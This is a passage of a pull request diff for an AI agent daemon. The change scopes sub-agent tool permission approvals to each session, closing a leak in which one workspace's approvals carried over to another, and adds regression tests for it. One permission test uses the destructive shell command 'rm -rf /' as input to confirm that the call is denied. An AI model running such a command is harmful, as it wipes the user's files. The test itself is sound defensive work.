### PR TITLE
feat(security): runtime governance fills the dispatcher (#480 PR 3/3 + #457)

### DIFF
--- a/aceclaw-bom/build.gradle.kts
+++ b/aceclaw-bom/build.gradle.kts
@@ -19,6 +19,8 @@ dependencies {
         api("com.fasterxml.jackson.core:jackson-databind:2.18.2")
         api("com.fasterxml.jackson.core:jackson-annotations:2.18.2")
         api("com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.18.2")
+        // jdk8 module: Optional<T> serde for Provenance fields (#480 PR 3)
+        api("com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.18.2")
 
         // Markdown
         api("org.commonmark:commonmark:0.23.0")

--- a/aceclaw-core/src/main/java/dev/aceclaw/core/agent/AgentLoop.java
+++ b/aceclaw-core/src/main/java/dev/aceclaw/core/agent/AgentLoop.java
@@ -253,7 +253,13 @@ public final class AgentLoop {
         // Check permission before execution
         if (config.permissionChecker() != null) {
             try {
-                var permResult = config.permissionChecker().check(toolUse.name(), toolUse.inputJson());
+                // #457: pass sessionId so sub-agent allow-list scoping is
+                // per-session — pre-fix this passed only (toolName, inputJson)
+                // and the SubAgentPermissionChecker fell back to a daemon-
+                // wide "any session approved this tool?" lookup that leaked
+                // approvals across workspaces.
+                var permResult = config.permissionChecker().check(
+                        toolUse.name(), toolUse.inputJson(), config.sessionId());
                 if (permResult == null || !permResult.allowed()) {
                     String reason = permResult != null ? permResult.reason() : "permission check returned null";
                     log.info("Tool {} denied: {}", toolUse.name(), reason);

--- a/aceclaw-core/src/main/java/dev/aceclaw/core/agent/StreamingAgentLoop.java
+++ b/aceclaw-core/src/main/java/dev/aceclaw/core/agent/StreamingAgentLoop.java
@@ -799,7 +799,11 @@ public final class StreamingAgentLoop {
         // Check permission before execution
         if (config.permissionChecker() != null) {
             try {
-                var permResult = config.permissionChecker().check(toolUse.name(), toolUse.inputJson());
+                // #457: pass sessionId so sub-agent allow-list scoping is
+                // per-session — see AgentLoop comment for the full leak
+                // story this prevents.
+                var permResult = config.permissionChecker().check(
+                        toolUse.name(), toolUse.inputJson(), config.sessionId());
                 if (permResult == null || !permResult.allowed()) {
                     String reason = permResult != null ? permResult.reason() : "permission check returned null";
                     log.info("Tool {} denied: {}", toolUse.name(), reason);

--- a/aceclaw-core/src/main/java/dev/aceclaw/core/agent/SubAgentPermissionChecker.java
+++ b/aceclaw-core/src/main/java/dev/aceclaw/core/agent/SubAgentPermissionChecker.java
@@ -1,7 +1,7 @@
 package dev.aceclaw.core.agent;
 
 import java.util.Set;
-import java.util.function.Predicate;
+import java.util.function.BiPredicate;
 
 /**
  * Permission checker for sub-agent tool execution.
@@ -12,33 +12,50 @@ import java.util.function.Predicate;
  *
  * <p>This prevents sub-agents from silently executing write/execute operations
  * that the user has not explicitly approved.
+ *
+ * <h3>Per-session scope (#457)</h3>
+ *
+ * Pre-#457 this checker used a daemon-wide
+ * {@code hasAnySessionApproval(toolName)} lookup that returned true if any
+ * session had approved the tool — meaning a sub-agent in workspace B would
+ * silently inherit a "remember" decision the user made in workspace A.
+ * Now keyed on {@code (sessionId, toolName)} so each session's allow-list
+ * stays in its own scope.
  */
 public final class SubAgentPermissionChecker implements ToolPermissionChecker {
 
     private final Set<String> readOnlyTools;
-    private final Predicate<String> isSessionApproved;
+    private final BiPredicate<String, String> isSessionApproved;
 
     /**
      * Creates a sub-agent permission checker.
      *
      * @param readOnlyTools     tool names considered safe (auto-approved)
-     * @param isSessionApproved predicate that checks if a tool has session-level approval
+     * @param isSessionApproved predicate of {@code (sessionId, toolName) ->
+     *                          isApproved} that does the per-session
+     *                          allow-list lookup. Wire to
+     *                          {@code permissionManager::hasSessionApproval}
+     *                          on the daemon side.
      */
     public SubAgentPermissionChecker(Set<String> readOnlyTools,
-                                      Predicate<String> isSessionApproved) {
+                                     BiPredicate<String, String> isSessionApproved) {
         this.readOnlyTools = Set.copyOf(readOnlyTools);
         this.isSessionApproved = isSessionApproved;
     }
 
     @Override
-    public ToolPermissionResult check(String toolName, String inputJson) {
+    public ToolPermissionResult check(String toolName, String inputJson, String sessionId) {
         // Read-only tools are always allowed
         if (readOnlyTools.contains(toolName)) {
             return ToolPermissionResult.ALLOWED;
         }
 
-        // Tools with session-level approval are allowed
-        if (isSessionApproved.test(toolName)) {
+        // Tools with session-level approval are allowed — keyed by THIS
+        // session's id so an approval granted in a different session does
+        // not silently apply here. A null sessionId (daemon-internal path
+        // that didn't supply one) cannot match any session-scoped approval,
+        // so falls through to denied — fail-closed by construction.
+        if (sessionId != null && isSessionApproved.test(sessionId, toolName)) {
             return ToolPermissionResult.ALLOWED;
         }
 

--- a/aceclaw-core/src/main/java/dev/aceclaw/core/agent/SubAgentPermissionChecker.java
+++ b/aceclaw-core/src/main/java/dev/aceclaw/core/agent/SubAgentPermissionChecker.java
@@ -1,5 +1,6 @@
 package dev.aceclaw.core.agent;
 
+import java.util.Objects;
 import java.util.Set;
 import java.util.function.BiPredicate;
 
@@ -39,8 +40,14 @@ public final class SubAgentPermissionChecker implements ToolPermissionChecker {
      */
     public SubAgentPermissionChecker(Set<String> readOnlyTools,
                                      BiPredicate<String, String> isSessionApproved) {
+        // Fail fast on miswiring: a null predicate would only surface on
+        // the first non-read-only tool execution, where the NPE would
+        // bubble up as a permission-check error well after construction.
+        // Construction-time null-guard makes the wiring bug obvious at
+        // daemon boot. (CodeRabbit review on #491.)
+        Objects.requireNonNull(readOnlyTools, "readOnlyTools");
         this.readOnlyTools = Set.copyOf(readOnlyTools);
-        this.isSessionApproved = isSessionApproved;
+        this.isSessionApproved = Objects.requireNonNull(isSessionApproved, "isSessionApproved");
     }
 
     @Override

--- a/aceclaw-core/src/main/java/dev/aceclaw/core/agent/SubAgentRunner.java
+++ b/aceclaw-core/src/main/java/dev/aceclaw/core/agent/SubAgentRunner.java
@@ -105,11 +105,19 @@ public final class SubAgentRunner {
      * @throws LlmException if the LLM call fails
      */
     public String run(SubAgentConfig config, String prompt, StreamEventHandler handler) throws LlmException {
-        return run(config, prompt, handler, null);
+        return run(config, prompt, handler, null, null);
     }
 
     /**
-     * Runs a sub-agent with cancellation support.
+     * Runs a sub-agent with cancellation support, no parent session bound.
+     *
+     * <p>Pre-#457 entry point — kept so existing callers and tests stay
+     * compiling. Without a parent sessionId the sub-agent's permission
+     * check sees {@code config.sessionId() == null}, which means
+     * {@link SubAgentPermissionChecker} cannot consult the per-session
+     * allow-list and falls back to deny for all non-read-only tools.
+     * Production callers reaching tools the user has approved should use
+     * {@link #run(SubAgentConfig, String, StreamEventHandler, CancellationToken, String)}.
      *
      * @param config            the sub-agent type configuration
      * @param prompt            the task prompt for the sub-agent
@@ -120,35 +128,66 @@ public final class SubAgentRunner {
      */
     public String run(SubAgentConfig config, String prompt, StreamEventHandler handler,
                       CancellationToken cancellationToken) throws LlmException {
-        return runWithTranscript(config, prompt, handler, cancellationToken).text();
+        return run(config, prompt, handler, cancellationToken, null);
+    }
+
+    /**
+     * Runs a sub-agent with cancellation support and the parent agent's
+     * sessionId threaded into the loop config (#457).
+     *
+     * <p>The parent's sessionId becomes {@code AgentLoopConfig.sessionId()},
+     * which {@link StreamingAgentLoop} passes to
+     * {@link ToolPermissionChecker#check(String, String, String)} so
+     * {@link SubAgentPermissionChecker} can look up the allow-list under
+     * the SAME session id the user approved against. Without this,
+     * approvals never apply to sub-agents — every non-read-only tool
+     * silently denies.
+     *
+     * @param parentSessionId the calling agent's session id, or {@code null}
+     *                        for daemon-internal callers (cron, boot
+     *                        scripts) that have no session in scope
+     */
+    public String run(SubAgentConfig config, String prompt, StreamEventHandler handler,
+                      CancellationToken cancellationToken, String parentSessionId) throws LlmException {
+        return runWithTranscript(config, prompt, handler, cancellationToken, parentSessionId).text();
     }
 
     /**
      * Runs a sub-agent with cancellation support, returning the full result
-     * including transcript and turn details.
-     *
-     * @param config            the sub-agent type configuration
-     * @param prompt            the task prompt for the sub-agent
-     * @param handler           optional stream event handler (may be null for silent execution)
-     * @param cancellationToken optional cancellation token from parent (may be null)
-     * @return the full sub-agent result with text, turn, and transcript
-     * @throws LlmException if the LLM call fails
+     * including transcript and turn details. Pre-#457 form.
      */
     public SubAgentResult runWithTranscript(SubAgentConfig config, String prompt,
                                             StreamEventHandler handler,
                                             CancellationToken cancellationToken) throws LlmException {
-        return runWithTranscript(config, prompt, handler, cancellationToken,
-                UUID.randomUUID().toString());
+        return runWithTranscript(config, prompt, handler, cancellationToken, null);
     }
 
     /**
-     * Internal: runs a sub-agent with a pre-assigned task ID.
-     * Used by {@link #runInBackground} to share the same ID across
-     * BackgroundTask, SubAgentResult, and transcript.
+     * Runs a sub-agent and returns the full result, threading the parent's
+     * {@code parentSessionId} into the loop config (#457). See
+     * {@link #run(SubAgentConfig, String, StreamEventHandler, CancellationToken, String)}
+     * for the why.
+     */
+    public SubAgentResult runWithTranscript(SubAgentConfig config, String prompt,
+                                            StreamEventHandler handler,
+                                            CancellationToken cancellationToken,
+                                            String parentSessionId) throws LlmException {
+        return runWithTranscript(config, prompt, handler, cancellationToken,
+                parentSessionId, UUID.randomUUID().toString());
+    }
+
+    /**
+     * Internal: runs a sub-agent with a pre-assigned task ID and the
+     * parent's sessionId. Used by {@link #runInBackground} to share the
+     * same task ID across BackgroundTask, SubAgentResult, and transcript;
+     * {@code parentSessionId} threads through to {@link AgentLoopConfig}
+     * so the per-session permission check (#457) can find the right
+     * allow-list.
      */
     private SubAgentResult runWithTranscript(SubAgentConfig config, String prompt,
                                              StreamEventHandler handler,
                                              CancellationToken cancellationToken,
+                                             String parentSessionId,
                                              String taskId) throws LlmException {
         Instant startedAt = Instant.now();
 
@@ -156,8 +195,9 @@ public final class SubAgentRunner {
         var filteredRegistry = createFilteredRegistry(config);
         String systemPrompt = buildSystemPrompt(config);
 
-        log.info("Starting sub-agent '{}' [{}]: model={}, tools={}, maxTurns={}",
-                config.name(), taskId, resolvedModel, filteredRegistry.size(), config.maxTurns());
+        log.info("Starting sub-agent '{}' [{}]: model={}, tools={}, maxTurns={}, parentSessionId={}",
+                config.name(), taskId, resolvedModel, filteredRegistry.size(), config.maxTurns(),
+                parentSessionId);
 
         // Build loop config with optional permission checker
         var loopConfigBuilder = AgentLoopConfig.builder();
@@ -165,6 +205,14 @@ public final class SubAgentRunner {
             loopConfigBuilder.permissionChecker(permissionChecker);
         }
         loopConfigBuilder.maxIterations(config.maxTurns());
+        // #457: thread parent sessionId so SubAgentPermissionChecker can
+        // see the right allow-list. {@code null} means "no session in
+        // scope" — fail-closed for non-read-only tools, which is correct
+        // for daemon-internal callers (cron, boot) but wrong for the
+        // task-tool path (TaskTool.forRequest must inject parent's id).
+        if (parentSessionId != null) {
+            loopConfigBuilder.sessionId(parentSessionId);
+        }
         var loopConfig = loopConfigBuilder.build();
 
         // Sub-agents use no compaction (short-lived, fresh context)
@@ -224,6 +272,19 @@ public final class SubAgentRunner {
      */
     public BackgroundTask runInBackground(SubAgentConfig config, String prompt,
                                           CancellationToken cancellationToken) {
+        return runInBackground(config, prompt, cancellationToken, null);
+    }
+
+    /**
+     * Launches a sub-agent in the background, threading the parent's
+     * sessionId into the loop config (#457). The background task's
+     * permission check uses {@code parentSessionId} for the allow-list
+     * lookup, so a tool the user approved in the parent session is
+     * also approved when the background task uses it.
+     */
+    public BackgroundTask runInBackground(SubAgentConfig config, String prompt,
+                                          CancellationToken cancellationToken,
+                                          String parentSessionId) {
         cleanupCompletedTasks();
 
         String taskId = UUID.randomUUID().toString();
@@ -232,7 +293,8 @@ public final class SubAgentRunner {
         var factory = Thread.ofVirtual().name("bg-task-" + taskId.substring(0, 8)).factory();
         var future = CompletableFuture.supplyAsync(() -> {
             try {
-                return runWithTranscript(config, prompt, null, cancellationToken, taskId);
+                return runWithTranscript(config, prompt, null, cancellationToken,
+                        parentSessionId, taskId);
             } catch (Exception e) {
                 throw new java.util.concurrent.CompletionException(e);
             }
@@ -241,8 +303,8 @@ public final class SubAgentRunner {
         var task = new BackgroundTask(taskId, config.name(), prompt, future, startedAt);
         backgroundTasks.put(taskId, task);
 
-        log.info("Launched background task [{}]: agent={}, prompt length={}",
-                taskId, config.name(), prompt.length());
+        log.info("Launched background task [{}]: agent={}, prompt length={}, parentSessionId={}",
+                taskId, config.name(), prompt.length(), parentSessionId);
 
         return task;
     }

--- a/aceclaw-core/src/main/java/dev/aceclaw/core/agent/ToolPermissionChecker.java
+++ b/aceclaw-core/src/main/java/dev/aceclaw/core/agent/ToolPermissionChecker.java
@@ -7,16 +7,51 @@ package dev.aceclaw.core.agent;
  * decisions without depending on aceclaw-security directly (dependency inversion).
  *
  * <p>Implementations typically wrap a {@code PermissionManager} from aceclaw-security.
+ *
+ * <h3>Per-session sessionId — issue #457</h3>
+ *
+ * The 3-arg {@link #check(String, String, String)} entry point carries the
+ * owning session id so a per-session allow-list cannot leak across sessions.
+ * Pre-#457 the sub-agent path used a daemon-wide {@code hasAnySessionApproval}
+ * lookup that returned true if <em>any</em> session had approved the tool —
+ * meaning a sub-agent in workspace B would inherit a "remember" approval
+ * granted in workspace A. The 3-arg form lets the daemon wire a per-session
+ * predicate so that leak is closed.
+ *
+ * <p>The legacy 2-arg form is preserved as a deprecated default that
+ * delegates with a {@code null} sessionId — implementations should override
+ * the 3-arg form. New call sites must always use the 3-arg form so they
+ * cannot accidentally drop the sessionId.
  */
-@FunctionalInterface
 public interface ToolPermissionChecker {
 
     /**
-     * Checks whether the given tool is permitted to execute.
+     * Checks whether the given tool is permitted to execute in the given
+     * session. {@code sessionId} is the calling agent's session — for a
+     * sub-agent path this is the parent session's id, so an approval
+     * granted to the user in session A does NOT auto-approve a sub-agent
+     * tool call originating in session B.
      *
      * @param toolName  the tool name (e.g. "bash", "write_file")
      * @param inputJson the raw JSON input to the tool
+     * @param sessionId the owning session, or {@code null} for daemon-internal
+     *                  paths that have no session in scope
      * @return the permission result
      */
-    ToolPermissionResult check(String toolName, String inputJson);
+    ToolPermissionResult check(String toolName, String inputJson, String sessionId);
+
+    /**
+     * Legacy 2-arg form retained for source compatibility with code that
+     * predates #457. Delegates to the 3-arg form with {@code sessionId = null},
+     * which means "treat as if no session is in scope" — fine for daemon-
+     * internal callers, NOT fine for sub-agents (which is exactly the leak
+     * #457 closes; new code must call the 3-arg form).
+     *
+     * @deprecated Use {@link #check(String, String, String)} so the
+     *             session-scoped allow-list lookup works correctly.
+     */
+    @Deprecated
+    default ToolPermissionResult check(String toolName, String inputJson) {
+        return check(toolName, inputJson, null);
+    }
 }

--- a/aceclaw-core/src/test/java/dev/aceclaw/core/agent/AgentLoopIntegrationTest.java
+++ b/aceclaw-core/src/test/java/dev/aceclaw/core/agent/AgentLoopIntegrationTest.java
@@ -155,7 +155,7 @@ class AgentLoopIntegrationTest {
         var config = AgentLoopConfig.builder()
                 .sessionId("perm-session")
                 .eventBus(eventBus)
-                .permissionChecker((toolName, input) ->
+                .permissionChecker((toolName, input, sid) ->
                         ToolPermissionResult.denied("Not allowed"))
                 .build();
 
@@ -190,7 +190,7 @@ class AgentLoopIntegrationTest {
         var config = AgentLoopConfig.builder()
                 .sessionId("perm-ok")
                 .eventBus(eventBus)
-                .permissionChecker((toolName, input) -> ToolPermissionResult.ALLOWED)
+                .permissionChecker((toolName, input, sid) -> ToolPermissionResult.ALLOWED)
                 .build();
 
         var loop = new AgentLoop(llm, registry, "model", null, config);

--- a/aceclaw-core/src/test/java/dev/aceclaw/core/agent/StreamingToolUseToolResultInvariantTest.java
+++ b/aceclaw-core/src/test/java/dev/aceclaw/core/agent/StreamingToolUseToolResultInvariantTest.java
@@ -93,7 +93,7 @@ class StreamingToolUseToolResultInvariantTest {
         registry.register(new StubTool("denied_b", "x"));
 
         var config = AgentLoopConfig.builder()
-                .permissionChecker((name, input) -> ToolPermissionResult.denied("nope"))
+                .permissionChecker((name, input, sid) -> ToolPermissionResult.denied("nope"))
                 .build();
 
         var loop = new StreamingAgentLoop(llm, registry, "model", null,

--- a/aceclaw-core/src/test/java/dev/aceclaw/core/agent/SubAgentPermissionCheckerTest.java
+++ b/aceclaw-core/src/test/java/dev/aceclaw/core/agent/SubAgentPermissionCheckerTest.java
@@ -4,37 +4,85 @@ import org.junit.jupiter.api.Test;
 
 import java.util.HashSet;
 import java.util.Set;
+import java.util.function.BiPredicate;
 
 import static org.assertj.core.api.Assertions.assertThat;
 
+/**
+ * Tests for {@link SubAgentPermissionChecker}.
+ *
+ * <p>Pinned behaviour:
+ *
+ * <ul>
+ *   <li>read-only tools auto-approve regardless of session;</li>
+ *   <li>session-approved tools auto-approve only for THE SAME session
+ *       (#457): an approval recorded in session A must not flip to
+ *       allowed when checked under session B;</li>
+ *   <li>unapproved write/execute tools deny;</li>
+ *   <li>{@code null} sessionId fails closed for non-read-only tools
+ *       (daemon-internal callers without a session can't borrow another
+ *       session's approval).</li>
+ * </ul>
+ */
 class SubAgentPermissionCheckerTest {
 
     private static final Set<String> READ_ONLY = Set.of("read_file", "glob", "grep", "memory");
 
-    @Test
-    void readOnlyToolsAreAllowed() {
-        var checker = new SubAgentPermissionChecker(READ_ONLY, _ -> false);
-
-        assertThat(checker.check("read_file", "{}").allowed()).isTrue();
-        assertThat(checker.check("glob", "{\"pattern\":\"*.java\"}").allowed()).isTrue();
-        assertThat(checker.check("grep", "{}").allowed()).isTrue();
-        assertThat(checker.check("memory", "{}").allowed()).isTrue();
+    /** Convenience: a checker with no session approvals at all. */
+    private static SubAgentPermissionChecker denyAll() {
+        return new SubAgentPermissionChecker(READ_ONLY, (sid, tool) -> false);
     }
 
     @Test
-    void sessionApprovedToolsAreAllowed() {
-        var approved = new HashSet<String>();
-        approved.add("write_file");
-        var checker = new SubAgentPermissionChecker(READ_ONLY, approved::contains);
+    void readOnlyToolsAreAllowedRegardlessOfSession() {
+        var checker = denyAll();
 
-        assertThat(checker.check("write_file", "{}").allowed()).isTrue();
+        // Read-only allow-list is session-agnostic; pass any sessionId
+        // (or null) and the answer is the same.
+        assertThat(checker.check("read_file", "{}", "any-session").allowed()).isTrue();
+        assertThat(checker.check("glob", "{\"pattern\":\"*.java\"}", null).allowed()).isTrue();
+        assertThat(checker.check("grep", "{}", "sess-Z").allowed()).isTrue();
+        assertThat(checker.check("memory", "{}", "sess-Z").allowed()).isTrue();
+    }
+
+    @Test
+    void sessionApprovedToolAllowedOnlyForSameSession() {
+        // Approval matrix: session "A" approved write_file; session "B" did not.
+        BiPredicate<String, String> isApproved = (sid, tool) ->
+                "A".equals(sid) && "write_file".equals(tool);
+        var checker = new SubAgentPermissionChecker(READ_ONLY, isApproved);
+
+        assertThat(checker.check("write_file", "{}", "A").allowed())
+                .as("session A approved write_file → allowed under session A")
+                .isTrue();
+
+        // The whole point of #457: B did NOT approve write_file, so a
+        // sub-agent running under session B must not silently inherit A's
+        // approval.
+        var resultB = checker.check("write_file", "{}", "B");
+        assertThat(resultB.allowed())
+                .as("session B has no write_file approval → must deny, not borrow A's")
+                .isFalse();
+        assertThat(resultB.reason()).contains("session approval");
+    }
+
+    @Test
+    void nullSessionIdFailsClosedForNonReadOnlyTools() {
+        // A daemon-internal caller with no session in scope cannot match
+        // any session-scoped approval — fail-closed by construction.
+        var alwaysApprove = new SubAgentPermissionChecker(READ_ONLY, (sid, tool) -> true);
+
+        var result = alwaysApprove.check("write_file", "{}", null);
+        assertThat(result.allowed())
+                .as("null sessionId must NOT skip the session-scope check; deny by default")
+                .isFalse();
     }
 
     @Test
     void unapprovedWriteToolsDenied() {
-        var checker = new SubAgentPermissionChecker(READ_ONLY, _ -> false);
+        var checker = denyAll();
 
-        var result = checker.check("write_file", "{}");
+        var result = checker.check("write_file", "{}", "any");
         assertThat(result.allowed()).isFalse();
         assertThat(result.reason()).contains("write_file");
         assertThat(result.reason()).contains("session approval");
@@ -42,10 +90,26 @@ class SubAgentPermissionCheckerTest {
 
     @Test
     void unapprovedExecuteToolsDenied() {
-        var checker = new SubAgentPermissionChecker(READ_ONLY, _ -> false);
+        var checker = denyAll();
 
-        var result = checker.check("bash", "{\"command\":\"rm -rf /\"}");
+        var result = checker.check("bash", "{\"command\":\"rm -rf /\"}", "any");
         assertThat(result.allowed()).isFalse();
         assertThat(result.reason()).contains("bash");
+    }
+
+    @Test
+    void approvalScopeStaysConsistentAcrossManySessions() {
+        // Multi-session sanity: each session has its own allow-list, and
+        // a write_file approval in session A must remain invisible to
+        // sessions B and C.
+        var sessionApprovals = new HashSet<String>();
+        sessionApprovals.add("A:write_file");
+        BiPredicate<String, String> isApproved =
+                (sid, tool) -> sessionApprovals.contains(sid + ":" + tool);
+        var checker = new SubAgentPermissionChecker(READ_ONLY, isApproved);
+
+        assertThat(checker.check("write_file", "{}", "A").allowed()).isTrue();
+        assertThat(checker.check("write_file", "{}", "B").allowed()).isFalse();
+        assertThat(checker.check("write_file", "{}", "C").allowed()).isFalse();
     }
 }

--- a/aceclaw-core/src/test/java/dev/aceclaw/core/agent/SubAgentRunnerTest.java
+++ b/aceclaw-core/src/test/java/dev/aceclaw/core/agent/SubAgentRunnerTest.java
@@ -412,4 +412,111 @@ class SubAgentRunnerTest {
         @Override public String provider() { return "stub"; }
         @Override public String defaultModel() { return "stub-model"; }
     }
+
+    // ===== #457: parent sessionId reaches the sub-agent permission check =====
+
+    @Test
+    void parentSessionIdReachesSubAgentPermissionCheck() throws Exception {
+        // Regression test for #457 (#480 PR 3 follow-up): SubAgentRunner.run(..., parentSessionId)
+        // must populate AgentLoopConfig.sessionId so the per-session permission check
+        // reaches the checker with the parent's id. Pre-fix the loop config's sessionId
+        // was always null, the SubAgentPermissionChecker's null-fail-closed branch
+        // kicked in, and EVERY non-read-only tool got denied — even ones the user
+        // had already approved in the parent session.
+        //
+        // The spy here captures the sessionId argument the loop hands to the
+        // permission checker; we then assert it's the parent id, not null.
+        var capturedSessionIds = new java.util.concurrent.CopyOnWriteArrayList<String>();
+        ToolPermissionChecker spy = (toolName, inputJson, sessionId) -> {
+            capturedSessionIds.add(sessionId == null ? "<null>" : sessionId);
+            // ALLOW so the tool actually executes and the loop progresses to
+            // end-of-turn instead of denying and short-circuiting.
+            return ToolPermissionResult.ALLOWED;
+        };
+
+        var parentRegistry = new ToolRegistry();
+        parentRegistry.register(stubTool("write_file"));
+
+        var runner = new SubAgentRunner(
+                new ToolUseOnceMockLlmClient(),
+                parentRegistry, "mock-model", tempDir, 4096, 0, spy, null);
+
+        var config = new SubAgentConfig("test", "", null, List.of(), List.of(), 25, "test");
+        runner.run(config, "do thing", null, null, "parent-session-A");
+
+        assertThat(capturedSessionIds)
+                .as("sub-agent's permission check must receive the parent's sessionId, not null")
+                .containsExactly("parent-session-A");
+    }
+
+    @Test
+    void nullParentSessionIdLeavesLoopConfigUnscoped() throws Exception {
+        // Daemon-internal callers (cron, boot scripts) pass null parentSessionId
+        // and have no session in scope. The legacy 4-arg run() overload also
+        // delegates with null. In both cases the loop config's sessionId stays
+        // null, which the permission checker treats as "no session" — fail-closed
+        // in SubAgentPermissionChecker, but here we use a permissive spy so the
+        // test only pins that null is what arrives.
+        var capturedSessionIds = new java.util.concurrent.CopyOnWriteArrayList<String>();
+        ToolPermissionChecker spy = (toolName, inputJson, sessionId) -> {
+            capturedSessionIds.add(sessionId == null ? "<null>" : sessionId);
+            return ToolPermissionResult.ALLOWED;
+        };
+
+        var parentRegistry = new ToolRegistry();
+        parentRegistry.register(stubTool("write_file"));
+        var runner = new SubAgentRunner(
+                new ToolUseOnceMockLlmClient(),
+                parentRegistry, "mock-model", tempDir, 4096, 0, spy, null);
+
+        var config = new SubAgentConfig("test", "", null, List.of(), List.of(), 25, "test");
+        // Legacy 4-arg form — no parent session in scope.
+        runner.run(config, "do thing", null, (CancellationToken) null);
+
+        assertThat(capturedSessionIds)
+                .as("legacy null-parent path must surface null sessionId, not a stale daemon-wide value")
+                .containsExactly("<null>");
+    }
+
+    /**
+     * Mock LLM that emits one {@code write_file} tool_use, then on the
+     * follow-up call (after the tool result is appended) emits an
+     * end-of-turn text response. This is the minimum surface needed to
+     * drive the permission check exactly once per test run.
+     */
+    private static final class ToolUseOnceMockLlmClient implements LlmClient {
+        private boolean firstCall = true;
+
+        @Override public LlmResponse sendMessage(LlmRequest request) {
+            throw new UnsupportedOperationException();
+        }
+
+        @Override public StreamSession streamMessage(LlmRequest request) {
+            return new StreamSession() {
+                @Override public void onEvent(StreamEventHandler handler) {
+                    handler.onMessageStart(new StreamEvent.MessageStart("msg", "mock"));
+                    if (firstCall) {
+                        firstCall = false;
+                        var toolUse = new ContentBlock.ToolUse("tu_1", "write_file", "{}");
+                        handler.onContentBlockStart(new StreamEvent.ContentBlockStart(0, toolUse));
+                        handler.onContentBlockStop(new StreamEvent.ContentBlockStop(0));
+                        handler.onMessageDelta(new StreamEvent.MessageDelta(
+                                StopReason.TOOL_USE, new Usage(10, 5)));
+                    } else {
+                        handler.onContentBlockStart(new StreamEvent.ContentBlockStart(0,
+                                new ContentBlock.Text("")));
+                        handler.onTextDelta(new StreamEvent.TextDelta("done"));
+                        handler.onContentBlockStop(new StreamEvent.ContentBlockStop(0));
+                        handler.onMessageDelta(new StreamEvent.MessageDelta(
+                                StopReason.END_TURN, new Usage(5, 2)));
+                    }
+                    handler.onComplete(new StreamEvent.StreamComplete());
+                }
+                @Override public void cancel() {}
+            };
+        }
+
+        @Override public String provider() { return "mock"; }
+        @Override public String defaultModel() { return "mock-model"; }
+    }
 }

--- a/aceclaw-core/src/test/java/dev/aceclaw/core/agent/ToolUseToolResultInvariantTest.java
+++ b/aceclaw-core/src/test/java/dev/aceclaw/core/agent/ToolUseToolResultInvariantTest.java
@@ -108,7 +108,7 @@ class ToolUseToolResultInvariantTest {
         registry.register(new StubTool("denied_b", "x"));
 
         var config = AgentLoopConfig.builder()
-                .permissionChecker((name, input) -> ToolPermissionResult.denied("nope"))
+                .permissionChecker((name, input, sid) -> ToolPermissionResult.denied("nope"))
                 .build();
 
         var loop = new AgentLoop(llm, registry, "model", null, config);

--- a/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/AceClawDaemon.java
+++ b/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/AceClawDaemon.java
@@ -406,14 +406,14 @@ public final class AceClawDaemon {
             readOnlyTools = java.util.Set.copyOf(readOnlyTools);
             log.info("Sub-agent auto-approve tools extended with: {}", extraTools);
         }
-        // Sub-agent allow-list lookup is daemon-wide for now (issue #456
-        // follow-up). The checker is constructed once at startup with no
-        // session in scope, so it asks "has any session approved this
-        // tool?" — preserving pre-#456 behaviour where a sub-agent in
-        // session B could reach a tool session A had approved. Threading
-        // sessionId through ToolPermissionChecker is a separate refactor.
+        // Sub-agent allow-list lookup is now per-session (#457): the
+        // checker receives the calling agent's sessionId on every check
+        // and looks up the allow-list keyed on that session. This closes
+        // the leak where a sub-agent in session B silently inherited an
+        // approval the user granted in session A — a regression of #456
+        // confined to the sub-agent path until threading was done.
         var subAgentPermChecker = new SubAgentPermissionChecker(
-                readOnlyTools, permissionManager::hasAnySessionApproval);
+                readOnlyTools, permissionManager::hasSessionApproval);
 
         // Project rules for sub-agent system prompts
         String projectRules = SystemPromptLoader.extractProjectRules(workingDir);

--- a/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/BootExecutor.java
+++ b/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/BootExecutor.java
@@ -225,7 +225,10 @@ public final class BootExecutor {
     static final class BootPermissionChecker implements ToolPermissionChecker {
 
         @Override
-        public ToolPermissionResult check(String toolName, String inputJson) {
+        public ToolPermissionResult check(String toolName, String inputJson, String sessionId) {
+            // Boot execution has no user session — sessionId is null and
+            // intentionally ignored. The allow-list is static (read-only
+            // tools only) so per-session scoping is not relevant here.
             if (BOOT_ALLOWED_TOOLS.contains(toolName)) {
                 return ToolPermissionResult.ALLOWED;
             }

--- a/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/StreamingAgentHandler.java
+++ b/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/StreamingAgentHandler.java
@@ -63,6 +63,7 @@ import dev.aceclaw.tools.MemoryTool;
 import dev.aceclaw.tools.ReadFileTool;
 import dev.aceclaw.tools.ScreenCaptureTool;
 import dev.aceclaw.tools.SkillTool;
+import dev.aceclaw.tools.TaskTool;
 import dev.aceclaw.tools.WebFetchTool;
 import dev.aceclaw.tools.WriteFileTool;
 import org.slf4j.Logger;
@@ -1731,6 +1732,10 @@ public final class StreamingAgentHandler {
             case "applescript" -> new AppleScriptTool(sessionProject);
             case "screen_capture" -> new ScreenCaptureTool(sessionProject);
             case "skill" -> original instanceof SkillTool st ? st.forRequest(sessionId, eventHandler) : original;
+            // #457: bind sessionId so SubAgentRunner's loop config carries
+            // the parent's id; otherwise the sub-agent's permission check
+            // fails-closed for every tool the user approved.
+            case "task" -> original instanceof TaskTool tt ? tt.forRequest(sessionId) : original;
             case "defer_check" -> original instanceof dev.aceclaw.daemon.deferred.DeferCheckTool dct
                     ? dct.forSession(sessionId)
                     : original;

--- a/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/StreamingAgentHandler.java
+++ b/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/StreamingAgentHandler.java
@@ -438,9 +438,16 @@ public final class StreamingAgentHandler {
         var requestTools = snapshotCurrentTools();
         var requestToolNames = toolNames(requestTools);
 
+        // #480 PR 3: stamp every capability check this turn with a single
+        // PromptId — the root of the Provenance chain. Generated once here
+        // so all tool invocations within this prompt share an identifier
+        // (audit replay can group by it; sub-agent spawns inherit it).
+        var promptId = new dev.aceclaw.security.ids.PromptId(
+                "prompt-" + UUID.randomUUID());
+
         // Wrap tools with permission checking and hooks for this request
         var permissionAwareRegistry = createPermissionAwareRegistry(
-                requestTools, cancelContext, sessionId, eventHandler);
